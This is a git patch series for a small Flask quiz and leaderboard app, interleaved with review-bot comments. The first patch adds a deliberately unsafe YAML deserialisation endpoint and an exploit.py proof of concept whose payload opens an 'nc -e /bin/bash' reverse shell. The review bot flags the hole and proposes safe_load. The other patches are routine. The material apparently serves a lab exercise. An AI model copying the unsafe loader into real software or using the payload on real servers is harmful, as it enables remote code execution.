From adcb48800c2104476d245d578a820ba1daf04347 Mon Sep 17 00:00:00 2001
From: furtest
Date: Fri, 5 Dec 2025 04:51:03 +0100
Subject: [PATCH 1/3] Working exploit and vuln

---
 exploit.py | 11 +++++++++++
 flask_base/app.py | 14 ++++++++++++--
 2 files changed, 23 insertions(+), 2 deletions(-)
 create mode 100644 exploit.py

diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..be244c8
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,11 @@
+import requests
+
+malicious_yaml = """
+!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
+"""
+url = "http://127.0.0.1:8080/api/leaderboard"
+headers = {
+    "Content-Type": "text/yaml"
+}
+response = requests.post(url, headers=headers, data=malicious_yaml)
+print(response.text)
diff --git a/flask_base/app.py b/flask_base/app.py
index ed0543d..5651b8a 100644
--- a/flask_base/app.py
+++ b/flask_base/app.py
@@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE):
 
 def read_leaderboard():
     with open(LEADERBOARD_FILE, 'r') as f:
-        return yaml.load(f, Loader=yaml.UnsafeLoader) or []
+        return yaml.safe_load(f) or []
 
 def write_leaderboard(data):
+    print(data)
     with open(LEADERBOARD_FILE, 'w') as f:
         yaml.safe_dump(data, f)
 
 @app.route('/api/leaderboard', methods=['POST'])
 def add_to_leaderboard():
-    new_entry = request.json
+    if request.content_type == 'text/yaml' or request.content_type == 'application/yaml':
+        try:
+            new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)
+        except yaml.YAMLError:
+            return jsonify({'error': 'Invalid YAML format'}), 400
+    else:
+        new_entry = request.json
+
+    print(new_entry)
     if not new_entry or 'name' not in new_entry or 'score' not in new_entry:
         return jsonify({'error': 'Name and score are required'}), 400
+
     leaderboard = read_leaderboard()
     leaderboard.append(new_entry)
     write_leaderboard(leaderboard)

From ec1a69580184d02dc1adedad5c40547bae7f34df Mon Sep 17 00:00:00 2001
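Review bot: exploit.py is committed at the repository root with no docstring or comment saying what it is, so a reader (or a packaging step that ships the whole tree) cannot tell it is a proof-of-concept against the deliberately unsafe endpoint rather than part of the application. A module docstring such as `"""Proof-of-concept request against the intentionally unsafe YAML endpoint in flask_base/app.py; not part of the application."""` at the top of the file would make that explicit, and keeping such artifacts under a clearly named directory that is excluded from any build or image would avoid deploying them by accident.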
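Review bot: The new `yaml.load(request.data, Loader=yaml.UnsafeLoader)` line in add_to_leaderboard hands an attacker-controlled request body to a loader that instantiates arbitrary Python objects, so any client that sends `Content-Type: text/yaml` can run code inside the server process — which is what the exploit.py added in this same commit shows. The commit switches the on-disk read in read_leaderboard to `safe_load` but leaves the request path unsafe; the line should be `new_entry = yaml.safe_load(request.data)`, which still raises `yaml.YAMLError` for malformed input so the existing except clause keeps working. The presence check that follows also accepts non-dict payloads (a bare string containing the words 'name' and 'score' passes both `in` tests and is appended to the leaderboard); `if not isinstance(new_entry, dict) or 'name' not in new_entry or 'score' not in new_entry:` closes that. The two added `print(...)` calls write raw, unvalidated client input to stdout; if they are meant as debugging they should go through the app logger or be dropped before merge. If the unsafe loader is a deliberate lab target, a comment on that line saying so would stop it being silently "fixed" or copied elsewhere.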
From: furtest
Date: Fri, 5 Dec 2025 05:15:23 +0100
Subject: [PATCH 2/3] =?UTF-8?q?R=C3=A9pare=20le=20pokemon?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 flask_base/app.py | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/flask_base/app.py b/flask_base/app.py
index 9c6e3f3..79c7b0d 100644
--- a/flask_base/app.py
+++ b/flask_base/app.py
@@ -38,19 +38,18 @@ def get_leaderboard():
 
 @app.route('/questions')
 def show_questions():
     with open('./data/quizz.json', 'r') as file:
-        #questions = json.load(file)["outils_list"]
         questions = json.load(file)
     return render_template('quiz.html', questions=questions)
-
-
 @app.route('/')
 def main():
     return render_template('index.html')
 
 @app.route('/pokemon')
 def poke():
-    return render_template('pokemon.html')
+    with open('./data/softwares.json', 'r') as file:
+        softwares = json.load(file)["outils_list"]
+    return render_template('pokemon.html', data=softwares)
 
 @app.route('/PAI')
 def pai():

From a121c472db2a4d77ee413462cb87e2d0531863d3 Mon Sep 17 00:00:00 2001
From: furtest
Date: Fri, 5 Dec 2025 05:32:26 +0100
Subject: [PATCH 3/3] Ignore scoreboard changes

---
 .gitignore | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 .gitignore

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..50a0482
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+leaderboard.yaml
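Review bot: The new `poke()` body opens `'./data/softwares.json'` by a path relative to the process working directory, so the route fails with a 500 whenever the app is launched from anywhere other than the directory holding `data/` (the existing show_questions has the same dependency, so this is a consistency point as much as a new one). Anchoring the path to the module, e.g. `with open(os.path.join(os.path.dirname(__file__), 'data', 'softwares.json'), 'r', encoding='utf-8') as file:`, removes that coupling — `os` is already used at module level in this file — assuming `data/` lives next to app.py, which should be confirmed. The `["outils_list"]` lookup will also surface as an unhandled `KeyError` if that top-level key is absent from the file, which is worth either validating once at startup or noting in a comment above the route.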